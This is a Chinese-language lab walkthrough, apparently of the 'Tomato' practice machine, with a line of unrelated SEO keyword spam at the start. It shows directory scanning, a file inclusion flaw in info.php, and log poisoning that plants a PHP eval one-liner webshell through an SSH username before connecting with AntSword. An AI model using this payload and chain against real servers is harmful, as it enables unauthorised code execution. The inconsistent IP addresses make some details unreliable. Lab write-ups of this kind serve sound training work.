网站建设方案企业,建设网站如入什么费,装饰装修公司排名前十强,网站的界面设计怎么做步骤一#xff0c;我们来到tomato页面 什么也弄不了只有一番茄图片
弱口令不行#xff0c;xxs也不行#xff0c;xxe还是不行
我们来使用kali来操作...
步骤二#xff0c;使用dirb再扫一下, dirb http://172.16.1.133 1.发现这个文件可以访问.我们来访问一下
/antibot_i…步骤一我们来到tomato页面 什么也弄不了只有一番茄图片
弱口令不行xxs也不行xxe还是不行
我们来使用kali来操作...
步骤二使用dirb再扫一下, dirb http://172.16.1.133 1.发现这个文件可以访问.我们来访问一下
/antibot_image/ 2.我们来看看他文件里面有什么东西是我们可以利用的 3.找到网站绝对路径 info.php我们来点击进去 4.查看页面源代码 可以发现image的文件包含. 5.在info.php后面输入?image/etc/passwd显示成功,说明存在文件包含漏洞
最下边 步骤三将一句话木马作为ssh登录的用户名登录
1.输入
ssh ?php phpinfo();eval($_POST[cmd]);?172.16.1.113 -p 2211
将一句话木马作为ssh登录的用户名然后登陆密码随便输入这样日志文件就会记录该用户登录失败的日志而该用户的用户名就是我们的一句话木马。 2.页面通过image传参查看日志文件
/var/log/auth.log
这个很阁僚...一开始有中间有下边还有不过我问了一下说有就行了 发现多了一些报错信息,大概率写入木马成功.
步骤四直接使用蚁剑进行连接:
http://172.16.1.113/antibot_image/antibots/info.php?image/var/log/auth.log
密码cmd 连接成功
